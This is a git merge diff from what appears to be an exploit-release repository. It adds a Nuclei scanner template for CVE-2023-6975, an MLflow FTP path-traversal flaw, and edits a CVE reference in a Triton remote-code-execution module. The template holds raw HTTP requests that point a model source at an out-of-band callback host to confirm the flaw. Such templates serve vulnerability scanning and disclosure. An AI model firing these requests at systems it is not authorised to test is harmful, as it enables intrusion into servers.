Merge pull request #9 from protectai/feb-exploit-release

Added mlflow URL parsing confusion Nuclei Template (CVE-2023-6975)

mlflow/nuclei-templates/mlflow-url-parsing-confusion-lfi.yaml

@@ -0,0 +1,41 @@
+id: mlflow-url-parsing-confusion-lfi
+info:
+  name: MLflow FTP Path Traversal
+  author: kevin-mizu, byt3bl33d3r
+  severity: high
+  description: An issue in MLflow's handling of FTP URLs allows for path traversal, enabling attackers to write files to arbitrary locations on the server.
+  reference: https://huntr.com/bounties/029a3824-cee3-4cf1-b260-7138aa539b85/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
+    cvss-score: 9.3
+    cve-id: CVE-2023-6975
+    cwe-id: CWE-29
+  tags: mlflow,ml,cve,path-traversal
+
+variables:
+  experiment_name: "{{rand_text_alpha(6)}}"
+
+http:
+  - raw:
+      - |
+        POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"name": "{{experiment_name}}"}
+      - |
+        POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"name": "{{experiment_name}}", "source": "ftp://{{interactsh-url}}/a"}
+      - |
+        GET /model-versions/get-artifact?path=random&name={{experiment_name}}&version=1 HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"

triton/triton_model_rce.py

@@ -38,7 +38,7 @@ metadata = {
     'license': 'MSF_LICENSE',
     'references': [
         {'type': 'url', 'ref': 'https://huntr.com/bounties/b27148e3-4da4-4e12-95ae-756d33d94687/'},
-        {'type': 'cve', 'ref': 'CVE-2023-6025'}
+        {'type': 'cve', 'ref': 'CVE-2023-31036'}
     ],
     'type': 'remote_exploit_cmd_stager',
     'targets': [